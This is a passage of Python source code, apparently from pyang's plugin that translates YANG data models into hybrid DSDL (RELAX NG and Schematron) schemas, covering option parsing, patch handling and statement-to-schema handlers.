\" metadata annotations\"),\n optparse.make_option(\"--dsdl-record-defs\",\n dest=\"dsdl_record_defs\",\n action=\"store_true\",\n default=False,\n help=\"Record all top-level defs\"\n \" (even if not used)\"),\n optparse.make_option(\"--dsdl-lax-yang-version\",\n dest=\"dsdl_lax_yang_version\",\n action=\"store_true\",\n default=False,\n help=\"Try to translate modules with \"\n \"unsupported YANG versions (use at own risk)\"),\n ]\n g = optparser.add_option_group(\"Hybrid DSDL schema \"\n \"output specific options\")\n g.add_options(optlist)\n\n def emit(self, ctx, modules, fd):\n if 'submodule' in [ m.keyword for m in modules ]:\n raise error.EmitError(\"Cannot translate submodules\")\n emit_dsdl(ctx, modules, fd)\n\ndef emit_dsdl(ctx, modules, fd):\n for epos, etag, eargs in ctx.errors:\n if error.is_error(error.err_level(etag)):\n raise error.EmitError(\"DSDL translation needs a valid module\")\n schema = HybridDSDLSchema().from_modules(modules,\n ctx.opts.dsdl_no_dublin_core,\n ctx.opts.dsdl_no_documentation,\n ctx.opts.dsdl_record_defs,\n ctx.opts.dsdl_lax_yang_version,\n debug=0)\n fd.write(schema.serialize())\n\nclass Patch(object):\n\n \"\"\"Instances of this class represent a patch to the YANG tree.\n\n A Patch is filled with substatements of 'refine' and/or 'augment'\n that are to be applied to a single node.\n\n Instance variables:\n\n * `self.path`: list specifying the relative path to the node where\n the patch is to be applied\n\n * `self.plist`: list of statements to apply\n \"\"\"\n\n def __init__(self, path, refaug):\n \"\"\"Initialize the instance with `refaug` statement.\n\n `refaug` must be either 'refine' or 'augment'.\n \"\"\"\n self.path = path\n self.plist = [refaug]\n\n def pop(self):\n \"\"\"Pop and return the first element of `self.path`.\"\"\"\n return self.path.pop(0)\n\n def combine(self, patch):\n \"\"\"Add `patch.plist` to `self.plist`.\"\"\"\n exclusive = set([\"config\", \"default\", \"mandatory\", \"presence\",\n \"min-elements\", \"max-elements\"])\n kws = set([s.keyword for s in self.plist]) & exclusive\n add = [n for n in patch.plist if n.keyword not in kws]\n self.plist.extend(add)\n\nclass HybridDSDLSchema(object):\n\n \"\"\"Instance of this class maps YANG to the hybrid 
DSDL schema.\n\n    Typically, only a single instance is created.\n\n    Instance variables:\n\n    * `self.all_defs`: dictionary of all named pattern\n      definitions. The keys are mangled names of the definitions.\n\n    * `self.data`: root of the data tree.\n\n    * `self.debug`: debugging information level (0 = no debugging).\n\n    * `self.gg_level`: level of immersion in global groupings.\n\n    * `self.global_defs`: dictionary of global (aka chameleon) named\n      pattern definitions. The keys are mangled names of the\n      definitions.\n\n    * `self.identities`: dictionary of identity names as keys and the\n      corresponding name pattern definitions as values.\n\n    * `self.identity_deps`: each item has an identity (statement) as\n      the key and a list of identities derived from the key identity\n      as the value.\n\n    * `self.local_defs`: dictionary of local named pattern\n      definitions. The keys are mangled names of the definitions.\n\n    * `self.local_grammar`: the inner <grammar> element containing the\n      mapping of a single YANG module.\n\n    * `self.module`: the module being processed.\n\n    * `self.module_prefixes`: maps module names to (disambiguated)\n      prefixes.\n\n    * `self.namespaces`: maps used namespace URIs to (disambiguated)\n      prefixes.\n\n    * `self.notifications`: root of the subtree containing\n      notifications.\n\n    * `self.prefix_stack`: stack of active module prefixes. A new\n      prefix is pushed on the stack for an augment from an external\n      module.\n\n    * `self.rpcs`: root of the subtree containing RPC signatures.\n\n    * `self.stmt_handler`: dictionary of methods that are dispatched\n      for handling individual YANG statements. Its keys are YANG\n      statement keywords.\n\n    * `self.top_grammar`: the outer (root) <grammar> element.\n\n    * `self.type_handler`: dictionary of methods that are dispatched\n      for handling individual YANG types. 
Its keys are the names of\n YANG built-in types.\n\n * `self.tree`: outer <start> pattern.\n\n \"\"\"\n\n YANG_version = 1.1\n \"\"\"Checked against the yang-version statement, if present.\"\"\"\n\n dc_uri = \"http://purl.org/dc/terms\"\n \"\"\"Dublin Core URI\"\"\"\n a_uri = \"http://relaxng.org/ns/compatibility/annotations/1.0\"\n \"\"\"DTD compatibility annotations URI\"\"\"\n\n datatype_map = {\n \"int8\": \"byte\",\n \"int16\": \"short\",\n \"int32\": \"int\",\n \"int64\": \"long\",\n \"uint8\": \"unsignedByte\",\n \"uint16\": \"unsignedShort\",\n \"uint32\": \"unsignedInt\",\n \"uint64\": \"unsignedLong\",\n \"decimal64\": \"decimal\",\n \"binary\": \"base64Binary\",\n \"string\": \"string\",\n }\n \"\"\"Mapping of simple datatypes from YANG to W3C datatype library\"\"\"\n\n data_nodes = (\"leaf\", \"container\", \"leaf-list\", \"list\",\n \"anydata\", \"anyxml\", \"rpc\", \"notification\")\n \"\"\"Keywords of YANG data nodes.\"\"\"\n\n schema_nodes = data_nodes + (\"choice\", \"case\")\n \"\"\"Keywords of YANG schema nodes.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the dispatch dictionaries.\"\"\"\n self.stmt_handler = {\n \"action\": self.noop,\n \"anyxml\": self.anyxml_stmt,\n \"anydata\": self.anyxml_stmt,\n \"argument\": self.noop,\n \"augment\": self.noop,\n \"base\": self.noop,\n \"belongs-to\": self.noop,\n \"bit\": self.noop,\n \"case\": self.case_stmt,\n \"choice\": self.choice_stmt,\n \"config\": self.nma_attribute,\n \"contact\": self.noop,\n \"container\": self.container_stmt,\n \"default\": self.noop,\n \"deviation\": self.noop,\n \"deviate\": self.noop,\n \"description\": self.description_stmt,\n \"enum\" : self.enum_stmt,\n \"error-app-tag\": self.noop,\n \"error-message\": self.noop,\n \"extension\": self.noop,\n \"feature\": self.noop,\n \"fraction-digits\": self.noop,\n \"identity\": self.noop,\n \"if-feature\": self.noop,\n \"import\" : self.noop,\n \"include\" : self.include_stmt,\n \"input\": self.noop,\n \"grouping\" : self.noop,\n \"key\": self.noop,\n \"leaf\": self.leaf_stmt,\n \"leaf-list\": self.leaf_list_stmt,\n \"length\": self.noop,\n \"list\": self.list_stmt,\n \"mandatory\": self.noop,\n \"max-elements\": self.noop,\n \"min-elements\": self.noop,\n \"modifier\": self.noop,\n \"module\": self.noop,\n \"must\": self.must_stmt,\n \"namespace\": self.noop,\n \"notification\": self.notification_stmt,\n \"ordered-by\": self.nma_attribute,\n \"organization\": self.noop,\n \"output\": self.noop,\n \"path\": self.noop,\n \"pattern\": self.noop,\n \"position\": self.noop,\n \"prefix\": self.noop,\n \"presence\": self.noop,\n \"range\": self.noop,\n \"reference\": self.reference_stmt,\n \"refine\": self.noop,\n \"require-instance\": self.noop,\n \"revision\": self.noop,\n \"revision-date\": self.noop,\n \"rpc\": self.rpc_stmt,\n \"status\": self.nma_attribute,\n \"submodule\": self.noop,\n \"type\": self.type_stmt,\n \"typedef\" : self.noop,\n \"unique\" : self.unique_stmt,\n \"units\" : self.nma_attribute,\n \"uses\" : self.uses_stmt,\n \"value\": self.noop,\n \"when\" : self.when_stmt,\n \"yang-version\": self.yang_version_stmt,\n \"yin-element\": self.noop,\n }\n self.ext_handler = {\n \"ietf-yang-metadata\": {\n \"annotation\": self.noop\n }\n }\n self.type_handler = {\n \"boolean\": self.boolean_type,\n \"binary\": self.binary_type,\n \"bits\": self.bits_type,\n \"decimal64\": self.numeric_type,\n \"enumeration\": self.choice_type,\n \"empty\": self.noop,\n \"identityref\": self.identityref_type,\n \"instance-identifier\": 
self.instance_identifier_type,\n \"int8\": self.numeric_type,\n \"int16\": self.numeric_type,\n \"int32\": self.numeric_type,\n \"int64\": self.numeric_type,\n \"leafref\": self.leafref_type,\n \"string\" : self.string_type,\n \"uint8\": self.numeric_type,\n \"uint16\": self.numeric_type,\n \"uint32\": self.numeric_type,\n \"uint64\": self.numeric_type,\n \"union\": self.choice_type,\n }\n\n def serialize(self):\n \"\"\"Return the string representation of the receiver.\"\"\"\n res = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>'\n for ns in self.namespaces:\n self.top_grammar.attr[\"xmlns:\" + self.namespaces[ns]] = ns\n res += self.top_grammar.start_tag()\n for ch in self.top_grammar.children:\n res += ch.serialize()\n res += self.tree.serialize()\n for d in self.global_defs:\n res += self.global_defs[d].serialize()\n for i in self.identities:\n res += self.identities[i].serialize()\n return res + self.top_grammar.end_tag()\n\n def from_modules(self, modules, no_dc=False, no_a=False,\n record_defs=False, lax_yang_version=False, debug=0):\n \"\"\"Return the instance representing mapped input modules.\"\"\"\n self.namespaces = {\n \"urn:ietf:params:xml:ns:netmod:dsdl-annotations:1\" : \"nma\",\n }\n if not no_dc:\n self.namespaces[self.dc_uri] = \"dc\"\n if not no_a:\n self.namespaces[self.a_uri] = \"a\"\n self.global_defs = {}\n self.all_defs = {}\n self.identity_deps = {}\n self.identities = {}\n self.debug = debug\n self.module_prefixes = {}\n gpset = {}\n self.gg_level = 0\n metadata = []\n self.has_meta = False\n for module in modules[0].i_ctx.modules.values():\n yver = module.search_one(\"yang-version\")\n if yver and float(yver.arg) > 1.0 and not lax_yang_version:\n raise error.EmitError(\n \"DSDL plugin supports only YANG version 1.\")\n if module.keyword == \"module\":\n for idn in module.i_identities.values():\n self.register_identity(idn)\n for module in modules:\n self.add_namespace(module)\n self.module = module\n annots = module.search((\"ietf-yang-metadata\", \"annotation\"))\n for ann in annots:\n aname = (self.module_prefixes[ann.main_module().arg] + \":\" +\n ann.arg)\n optel = SchemaNode(\"optional\")\n atel = SchemaNode(\"attribute\", optel).set_attr(\"name\", aname)\n self.handle_substmts(ann, atel)\n metadata.append(optel)\n if metadata:\n self.has_meta = True\n metel = SchemaNode.define(\"__yang_metadata__\")\n self.global_defs[\"__yang_metadata__\"] = metel\n for mattr in metadata:\n metel.subnode(mattr)\n for module in modules:\n self.module = module\n self.prefix_stack = [self.module_prefixes[module.arg]]\n for aug in module.search(\"augment\"):\n self.add_patch(gpset, aug)\n for sub in [ module.i_ctx.get_module(inc.arg)\n for inc in module.search(\"include\") ]:\n for aug in sub.search(\"augment\"):\n self.add_patch(gpset, aug)\n self.setup_top()\n for module in modules:\n self.module = module\n self.local_defs = {}\n if record_defs:\n self.preload_defs()\n self.prefix_stack = [self.module_prefixes[module.arg]]\n self.create_roots(module)\n self.lookup_expand(module, list(gpset))\n self.handle_substmts(module, self.data, gpset)\n for d in list(self.local_defs.values()):\n self.local_grammar.subnode(d)\n self.tree.subnode(self.local_grammar)\n self.all_defs.update(self.local_defs)\n self.all_defs.update(self.global_defs)\n self.dc_element(self.top_grammar, \"date\", time.strftime(\"%Y-%m-%d\"))\n return self\n\n def setup_top(self):\n \"\"\"Create top-level elements of the hybrid schema.\"\"\"\n self.top_grammar = SchemaNode(\"grammar\")\n self.top_grammar.attr = {\n 
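# RELAX NG structure namespace with W3C XML Schema datatypes\n            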
\"xmlns\": \"http://relaxng.org/ns/structure/1.0\",\n \"datatypeLibrary\": \"http://www.w3.org/2001/XMLSchema-datatypes\"}\n self.tree = SchemaNode(\"start\")\n\n def create_roots(self, yam):\n \"\"\"Create the top-level structure for module `yam`.\"\"\"\n self.local_grammar = SchemaNode(\"grammar\")\n self.local_grammar.attr = {\n \"ns\": yam.search_one(\"namespace\").arg,\n \"nma:module\": self.module.arg}\n src_text = \"YANG module '%s'\" % yam.arg\n revs = yam.search(\"revision\")\n if len(revs) > 0:\n src_text += \" revision %s\" % self.current_revision(revs)\n self.dc_element(self.local_grammar, \"source\", src_text)\n start = SchemaNode(\"start\", self.local_grammar)\n self.data = SchemaNode(\"nma:data\", start, interleave=True)\n self.data.occur = 2\n self.rpcs = SchemaNode(\"nma:rpcs\", start, interleave=False)\n self.notifications = SchemaNode(\"nma:notifications\", start,\n interleave=False)\n\n def yang_to_xpath(self, xpe):\n \"\"\"Transform YANG's `xpath` to a form suitable for Schematron.\n\n 1. Prefixes are added to unprefixed local names. Inside global\n groupings, the prefix is represented as the variable\n '$pref' which is substituted via Schematron abstract\n patterns.\n 2. '$root' is prepended to every absolute location path.\n \"\"\"\n if self.gg_level:\n pref = \"$pref:\"\n else:\n pref = self.prefix_stack[-1] + \":\"\n toks = xpath_lexer.scan(xpe)\n prev = None\n res = \"\"\n for tok in toks:\n if (tok.type == \"SLASH\" and\n prev not in (\"DOT\", \"DOTDOT\", \"RPAREN\", \"RBRACKET\", \"name\",\n \"wildcard\", \"prefix_test\")):\n res += \"$root\"\n elif tok.type == \"name\" and \":\" not in tok.value:\n res += pref\n res += tok.value\n if tok.type != \"_whitespace\":\n prev = tok.type\n return res\n\n def add_namespace(self, module):\n \"\"\"Add item uri:prefix for `module` to `self.namespaces`.\n\n The prefix to be actually used for `uri` is returned. If the\n namespace is already present, the old prefix is used. 
Prefix\n clashes are resolved by disambiguating `prefix`.\n \"\"\"\n uri = module.search_one(\"namespace\").arg\n prefix = module.search_one(\"prefix\").arg\n if uri in self.namespaces:\n return self.namespaces[uri]\n end = 1\n new = prefix\n while new in list(self.namespaces.values()):\n new = \"%s%x\" % (prefix,end)\n end += 1\n self.namespaces[uri] = new\n self.module_prefixes[module.arg] = new\n for inc in module.search(\"include\"):\n self.module_prefixes[inc.arg] = new\n return new\n\n def register_identity(self, id_stmt):\n \"\"\"Register `id_stmt` with its base identity, if any.\n \"\"\"\n bst = id_stmt.search_one(\"base\")\n if bst:\n bder = self.identity_deps.setdefault(bst.i_identity, [])\n bder.append(id_stmt)\n\n def add_derived_identity(self, id_stmt):\n \"\"\"Add pattern def for `id_stmt` and all derived identities.\n\n The corresponding \"ref\" pattern is returned.\n \"\"\"\n p = self.add_namespace(id_stmt.main_module())\n if id_stmt not in self.identities: # add named pattern def\n self.identities[id_stmt] = SchemaNode.define(\"__%s_%s\" %\n (p, id_stmt.arg))\n parent = self.identities[id_stmt]\n if id_stmt in self.identity_deps:\n parent = SchemaNode.choice(parent, occur=2)\n for i in self.identity_deps[id_stmt]:\n parent.subnode(self.add_derived_identity(i))\n idval = SchemaNode(\"value\", parent, p+\":\"+id_stmt.arg)\n idval.attr[\"type\"] = \"QName\"\n res = SchemaNode(\"ref\")\n res.attr[\"name\"] = self.identities[id_stmt].attr[\"name\"]\n return res\n\n def preload_defs(self):\n \"\"\"Preload all top-level definitions.\"\"\"\n for d in (self.module.search(\"grouping\") +\n self.module.search(\"typedef\")):\n uname, dic = self.unique_def_name(d)\n self.install_def(uname, d, dic)\n\n def add_prefix(self, name, stmt):\n \"\"\"Return `name` prepended with correct prefix.\n\n If the name is already prefixed, the prefix may be translated\n to the value obtained from `self.module_prefixes`. Unmodified\n `name` is returned if we are inside a global grouping.\n \"\"\"\n if self.gg_level:\n return name\n pref, colon, local = name.partition(\":\")\n if colon:\n return (self.module_prefixes[stmt.i_module.i_prefixes[pref][0]]\n + \":\" + local)\n else:\n return self.prefix_stack[-1] + \":\" + pref\n\n def qname(self, stmt):\n \"\"\"Return (prefixed) node name of `stmt`.\n\n The result is prefixed with the local prefix unless we are\n inside a global grouping.\n \"\"\"\n if self.gg_level:\n return stmt.arg\n return self.prefix_stack[-1] + \":\" + stmt.arg\n\n def dc_element(self, parent, name, text):\n \"\"\"Add DC element `name` containing `text` to `parent`.\"\"\"\n if self.dc_uri in self.namespaces:\n dcel = SchemaNode(self.namespaces[self.dc_uri] + \":\" + name,\n text=text)\n parent.children.insert(0,dcel)\n\n def get_default(self, stmt, refd):\n \"\"\"Return default value for `stmt` node.\n\n `refd` is a dictionary of applicable refinements that is\n constructed in the `process_patches` method.\n \"\"\"\n if refd[\"default\"]:\n return refd[\"default\"]\n defst = stmt.search_one(\"default\")\n if defst:\n return defst.arg\n return None\n\n def unique_def_name(self, stmt, inrpc=False):\n \"\"\"Mangle the name of `stmt` (typedef or grouping).\n\n Return the mangled name and dictionary where the definition is\n to be installed. 
The `inrpc` flag indicates when we are inside\n an RPC, in which case the name gets the \"__rpc\" suffix.\n \"\"\"\n module = stmt.main_module()\n name = \"\"\n while True:\n pref = stmt.arg if stmt.arg else stmt.keyword\n name = \"__\" + pref + name\n if stmt.keyword == \"grouping\":\n name = \"_\" + name\n if stmt.parent.parent is None:\n break\n stmt = stmt.parent\n defs = (self.global_defs\n if stmt.keyword in (\"grouping\", \"typedef\")\n else self.local_defs)\n if inrpc:\n name += \"__rpc\"\n return (module.arg + name, defs)\n\n def add_patch(self, pset, augref):\n \"\"\"Add patch corresponding to `augref` to `pset`.\n\n `augref` must be either 'augment' or 'refine' statement.\n \"\"\"\n try:\n path = [ self.add_prefix(c, augref)\n for c in augref.arg.split(\"/\") if c ]\n except KeyError:\n # augment of a module that's not among input modules\n return\n car = path[0]\n patch = Patch(path[1:], augref)\n if car in pset:\n sel = [ x for x in pset[car] if patch.path == x.path ]\n if sel:\n sel[0].combine(patch)\n else:\n pset[car].append(patch)\n else:\n pset[car] = [patch]\n\n def apply_augments(self, auglist, p_elem, pset):\n \"\"\"Handle substatements of augments from `auglist`.\n\n The augments are applied in the context of `p_elem`. `pset`\n is a patch set containing patches that may be applicable to\n descendants.\n \"\"\"\n for a in auglist:\n par = a.parent\n if a.search_one(\"when\") is None:\n wel = p_elem\n else:\n if p_elem.interleave:\n kw = \"interleave\"\n else:\n kw = \"group\"\n wel = SchemaNode(kw, p_elem, interleave=p_elem.interleave)\n wel.occur = p_elem.occur\n if par.keyword == \"uses\":\n self.handle_substmts(a, wel, pset)\n continue\n if par.keyword == \"submodule\":\n mnam = par.i_including_modulename\n else:\n mnam = par.arg\n if self.prefix_stack[-1] == self.module_prefixes[mnam]:\n self.handle_substmts(a, wel, pset)\n else:\n self.prefix_stack.append(self.module_prefixes[mnam])\n self.handle_substmts(a, wel, pset)\n self.prefix_stack.pop()\n\n def current_revision(self, r_stmts):\n \"\"\"Pick the most recent revision date.\n\n `r_stmts` is a list of 'revision' statements.\n \"\"\"\n cur = max([[int(p) for p in r.arg.split(\"-\")] for r in r_stmts])\n return \"%4d-%02d-%02d\" % tuple(cur)\n\n def insert_doc(self, p_elem, docstring):\n \"\"\"Add <a:documentation> with `docstring` to `p_elem`.\"\"\"\n dtag = self.namespaces[self.a_uri] + \":documentation\"\n elem = SchemaNode(dtag, text=docstring)\n p_elem.annots.append(elem)\n\n def install_def(self, name, dstmt, def_map, interleave=False):\n \"\"\"Install definition `name` into the appropriate dictionary.\n\n `dstmt` is the definition statement ('typedef' or 'grouping')\n that is to be mapped to a RELAX NG named pattern '<define\n name=\"`name`\">'. `def_map` must be either `self.local_defs` or\n `self.global_defs`. 
`interleave` determines the interleave\n        status inside the definition.\n        \"\"\"\n        delem = SchemaNode.define(name, interleave=interleave)\n        delem.attr[\"name\"] = name\n        def_map[name] = delem\n        if def_map is self.global_defs:\n            self.gg_level += 1\n        self.handle_substmts(dstmt, delem)\n        if def_map is self.global_defs:\n            self.gg_level -= 1\n\n    def rng_annotation(self, stmt, p_elem):\n        \"\"\"Append YIN representation of extension statement `stmt`.\"\"\"\n        ext = stmt.i_extension\n        prf, extkw = stmt.raw_keyword\n        (modname,rev)=stmt.i_module.i_prefixes[prf]\n        prefix = self.add_namespace(\n            statements.modulename_to_module(self.module,modname,rev))\n        eel = SchemaNode(prefix + \":\" + extkw, p_elem)\n        argst = ext.search_one(\"argument\")\n        if argst:\n            if argst.search_one(\"yin-element\", \"true\"):\n                SchemaNode(prefix + \":\" + argst.arg, eel, stmt.arg)\n            else:\n                eel.attr[argst.arg] = stmt.arg\n        self.handle_substmts(stmt, eel)\n\n    def propagate_occur(self, node, value):\n        \"\"\"Propagate occurrence `value` to `node` and its ancestors.\n\n        Occurrence values are defined and explained in the SchemaNode\n        class.\n        \"\"\"\n        while node.occur < value:\n            node.occur = value\n            if node.name == \"define\":\n                break\n            node = node.parent\n\n    def process_patches(self, pset, stmt, elem, altname=None):\n        \"\"\"Process patches for data node `name` from `pset`.\n\n        `stmt` provides the context in YANG and `elem` is the parent\n        element in the output schema. Refinements adding documentation\n        and changing the config status are immediately applied.\n\n        The returned tuple consists of:\n        - a dictionary of refinements, in which keys are the keywords\n          of the refinement statements and values are the new values\n          of refined parameters.\n        - a list of 'augment' statements that are to be applied\n          directly under `elem`.\n        - a new patch set containing patches applicable to\n          substatements of `stmt`.\n        \"\"\"\n        if altname:\n            name = altname\n        else:\n            name = stmt.arg\n        new_pset = {}\n        augments = []\n        refine_dict = dict.fromkeys((\"presence\", \"default\", \"mandatory\",\n                                     \"min-elements\", \"max-elements\"))\n        if not isinstance(pset, dict):\n            raise ValueError('pset is of type %s' % type(pset).__name__)\n        for p in pset.pop(self.add_prefix(name, stmt), []):\n            if p.path:\n                head = p.pop()\n                if head in new_pset:\n                    new_pset[head].append(p)\n                else:\n                    new_pset[head] = [p]\n            else:\n                for refaug in p.plist:\n                    if refaug.keyword == \"augment\":\n                        augments.append(refaug)\n                    else:\n                        for s in refaug.substmts:\n                            if s.keyword == \"description\":\n                                self.description_stmt(s, elem, None)\n                            elif s.keyword == \"reference\":\n                                self.reference_stmt(s, elem, None)\n                            elif s.keyword == \"must\":\n                                self.must_stmt(s, elem, None)\n                            elif s.keyword == \"config\":\n                                self.nma_attribute(s, elem)\n                            elif refine_dict.get(s.keyword, False) is None:\n                                refine_dict[s.keyword] = s.arg\n        return (refine_dict, augments, new_pset)\n\n    def get_minmax(self, stmt, refine_dict):\n        \"\"\"Return pair of (min,max)-elements values for `stmt`.\n\n        `stmt` must be a 'list' or 'leaf-list'. 
Applicable refinements\n from `refine_dict` are also taken into account.\n \"\"\"\n minel = refine_dict[\"min-elements\"]\n maxel = refine_dict[\"max-elements\"]\n if minel is None:\n minst = stmt.search_one(\"min-elements\")\n if minst:\n minel = minst.arg\n else:\n minel = \"0\"\n if maxel is None:\n maxst = stmt.search_one(\"max-elements\")\n if maxst:\n maxel = maxst.arg\n if maxel == \"unbounded\":\n maxel = None\n return (minel, maxel)\n\n def lookup_expand(self, stmt, names):\n \"\"\"Find schema nodes under `stmt`, also in used groupings.\n\n `names` is a list with qualified names of the schema nodes to\n look up. All 'uses'/'grouping' pairs between `stmt` and found\n schema nodes are marked for expansion.\n \"\"\"\n if not names:\n return []\n todo = [stmt]\n while todo:\n pst = todo.pop()\n for sub in pst.substmts:\n if sub.keyword in self.schema_nodes:\n qname = self.qname(sub)\n if qname in names:\n names.remove(qname)\n par = sub.parent\n while hasattr(par,\"d_ref\"): # par must be grouping\n par.d_ref.d_expand = True\n par = par.d_ref.parent\n if not names:\n return [] # all found\n elif sub.keyword == \"uses\":\n g = sub.i_grouping\n g.d_ref = sub\n todo.append(g)\n return names\n\n def type_with_ranges(self, tchain, p_elem, rangekw, gen_data):\n \"\"\"Handle types with 'range' or 'length' restrictions.\n\n `tchain` is the chain of type definitions from which the\n ranges may need to be extracted. `rangekw` is the statement\n keyword determining the range type (either 'range' or\n 'length'). `gen_data` is a function that generates the\n output schema node (a RELAX NG <data> pattern).\n \"\"\"\n ranges = self.get_ranges(tchain, rangekw)\n if not ranges:\n return p_elem.subnode(gen_data())\n if len(ranges) > 1:\n p_elem = SchemaNode.choice(p_elem)\n p_elem.occur = 2\n for r in ranges:\n d_elem = gen_data()\n for p in self.range_params(r, rangekw):\n d_elem.subnode(p)\n p_elem.subnode(d_elem)\n\n def get_ranges(self, tchain, kw):\n \"\"\"Return list of ranges defined in `tchain`.\n\n `kw` is the statement keyword determining the type of the\n range, i.e. 'range' or 'length'. `tchain` is the chain of type\n definitions from which the resulting range is obtained.\n\n The returned value is a list of tuples containing the segments\n of the resulting range.\n \"\"\"\n (lo, hi) = (\"min\", \"max\")\n ran = None\n for t in tchain:\n rstmt = t.search_one(kw)\n if rstmt is None:\n continue\n parts = [ p.strip() for p in rstmt.arg.split(\"|\") ]\n ran = [ [ i.strip() for i in p.split(\"..\") ] for p in parts ]\n if ran[0][0] != 'min':\n lo = ran[0][0]\n if ran[-1][-1] != 'max':\n hi = ran[-1][-1]\n if ran is None:\n return None\n if len(ran) == 1:\n return [(lo, hi)]\n else:\n return [(lo, ran[0][-1])] + ran[1:-1] + [(ran[-1][0], hi)]\n\n def range_params(self, ran, kw):\n \"\"\"Return list of <param>s corresponding to range `ran`.\n\n `kw` is the statement keyword determining the type of the\n range, i.e. 'range' or 'length'. 
`ran` is the internal\n representation of a range as constructed by the `get_ranges`\n method.\n \"\"\"\n if kw == \"length\":\n if ran[0][0] != \"m\" and (len(ran) == 1 or ran[0] == ran[1]):\n elem = SchemaNode(\"param\").set_attr(\"name\",\"length\")\n elem.text = ran[0]\n return [elem]\n min_ = SchemaNode(\"param\").set_attr(\"name\",\"minLength\")\n max_ = SchemaNode(\"param\").set_attr(\"name\",\"maxLength\")\n else:\n if len(ran) == 1:\n ran *= 2 # duplicating the value\n min_ = SchemaNode(\"param\").set_attr(\"name\",\"minInclusive\")\n max_ = SchemaNode(\"param\").set_attr(\"name\",\"maxInclusive\")\n res = []\n if ran[0][0] != \"m\":\n elem = min_\n elem.text = ran[0]\n res.append(elem)\n if ran[1][0] != \"m\":\n elem = max_\n elem.text = ran[1]\n res.append(elem)\n return res\n\n def handle_stmt(self, stmt, p_elem, pset=None):\n \"\"\"\n Run handler method for statement `stmt`.\n\n `p_elem` is the parent node in the output schema. `pset` is\n the current \"patch set\" - a dictionary with keys being QNames\n of schema nodes at the current level of hierarchy for which\n (or descendants thereof) any pending patches exist. The values\n are instances of the Patch class.\n\n All handler methods are defined below and must have the same\n arguments as this method. They should create the output schema\n fragment corresponding to `stmt`, apply all patches from\n `pset` belonging to `stmt`, insert the fragment under `p_elem`\n and perform all side effects as necessary.\n \"\"\"\n if self.debug > 0:\n sys.stderr.write(\"Handling '%s %s'\\n\" %\n (util.keyword_to_str(stmt.raw_keyword), stmt.arg))\n try:\n method = self.stmt_handler[stmt.keyword]\n except KeyError:\n if isinstance(stmt.keyword, tuple):\n try:\n method = self.ext_handler[stmt.keyword[0]][stmt.keyword[1]]\n except KeyError:\n method = self.rng_annotation\n method(stmt, p_elem)\n return\n else:\n raise error.EmitError(\n \"Unknown keyword %s - this should not happen.\\n\"\n % stmt.keyword)\n if pset is None:\n pset = {}\n method(stmt, p_elem, pset)\n\n def handle_substmts(self, stmt, p_elem, pset=None):\n \"\"\"Handle all substatements of `stmt`.\"\"\"\n if pset is None:\n pset = {}\n for sub in stmt.substmts:\n self.handle_stmt(sub, p_elem, pset)\n\n # Handlers for YANG statements\n\n def noop(self, stmt, p_elem, pset=None):\n \"\"\"`stmt` is not handled in the regular way.\"\"\"\n pass\n\n def anyxml_stmt(self, stmt, p_elem, pset):\n elem = SchemaNode.element(self.qname(stmt), p_elem)\n if self.has_meta:\n elem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n SchemaNode(\"parentRef\", elem).set_attr(\"name\", \"__anyxml__\")\n refd, _, _ = self.process_patches(pset, stmt, elem)\n if p_elem.name == \"choice\":\n elem.occur = 3\n elif refd[\"mandatory\"] or stmt.search_one(\"mandatory\", \"true\"):\n elem.occur = 2\n self.propagate_occur(p_elem, 2)\n self.handle_substmts(stmt, elem)\n\n def nma_attribute(self, stmt, p_elem, pset=None):\n \"\"\"Map `stmt` to a NETMOD-specific attribute.\n\n The name of the attribute is the same as the 'keyword' of\n `stmt`.\n \"\"\"\n att = \"nma:\" + stmt.keyword\n if att not in p_elem.attr:\n p_elem.attr[att] = stmt.arg\n\n def case_stmt(self, stmt, p_elem, pset):\n celem = SchemaNode.case(p_elem)\n if p_elem.default_case != stmt.arg:\n celem.occur = 3\n refd, augs, new_pset = self.process_patches(pset, stmt, celem)\n left = self.lookup_expand(stmt, list(new_pset))\n for a in augs:\n left = self.lookup_expand(a, left)\n self.handle_substmts(stmt, celem, new_pset)\n 
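# apply the augments gathered for this case within the case element's context\n        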
self.apply_augments(augs, celem, new_pset)\n\n def choice_stmt(self, stmt, p_elem, pset):\n chelem = SchemaNode.choice(p_elem)\n chelem.attr[\"nma:name\"] = stmt.arg\n refd, augs, new_pset = self.process_patches(pset, stmt, chelem)\n left = self.lookup_expand(stmt, list(new_pset))\n for a in augs:\n left = self.lookup_expand(a, left)\n if refd[\"mandatory\"] or stmt.search_one(\"mandatory\", \"true\"):\n chelem.attr[\"nma:mandatory\"] = \"true\"\n self.propagate_occur(chelem, 2)\n else:\n defv = self.get_default(stmt, refd)\n if defv is not None:\n chelem.default_case = defv\n else:\n chelem.occur = 3\n self.handle_substmts(stmt, chelem, new_pset)\n self.apply_augments(augs, chelem, new_pset)\n\n def container_stmt(self, stmt, p_elem, pset):\n celem = SchemaNode.element(self.qname(stmt), p_elem)\n if self.has_meta:\n celem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n refd, augs, new_pset = self.process_patches(pset, stmt, celem)\n left = self.lookup_expand(stmt, list(new_pset))\n for a in augs:\n left = self.lookup_expand(a, left)\n if (p_elem.name == \"choice\" and p_elem.default_case != stmt.arg\n or p_elem.name == \"case\" and\n p_elem.parent.default_case != stmt.parent.arg and\n len(stmt.parent.i_children) < 2 or\n refd[\"presence\"] or stmt.search_one(\"presence\")):\n celem.occur = 3\n self.handle_substmts(stmt, celem, new_pset)\n self.apply_augments(augs, celem, new_pset)\n\n def description_stmt(self, stmt, p_elem, pset):\n # ignore imported and top-level descriptions + desc. of enum\n if (self.a_uri in self.namespaces and\n stmt.i_module == self.module != stmt.parent and\n stmt.parent.keyword != \"enum\"):\n self.insert_doc(p_elem, stmt.arg)\n\n def enum_stmt(self, stmt, p_elem, pset):\n elem = SchemaNode(\"value\", p_elem, stmt.arg)\n for sub in stmt.search(\"status\"):\n self.handle_stmt(sub, elem)\n\n def include_stmt(self, stmt, p_elem, pset):\n if stmt.parent.keyword == \"module\":\n subm = self.module.i_ctx.get_module(stmt.arg)\n self.handle_substmts(subm, p_elem, pset)\n\n def leaf_stmt(self, stmt, p_elem, pset):\n qname = self.qname(stmt)\n elem = SchemaNode.element(qname)\n if self.has_meta:\n elem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n if p_elem.name == \"_list_\" and 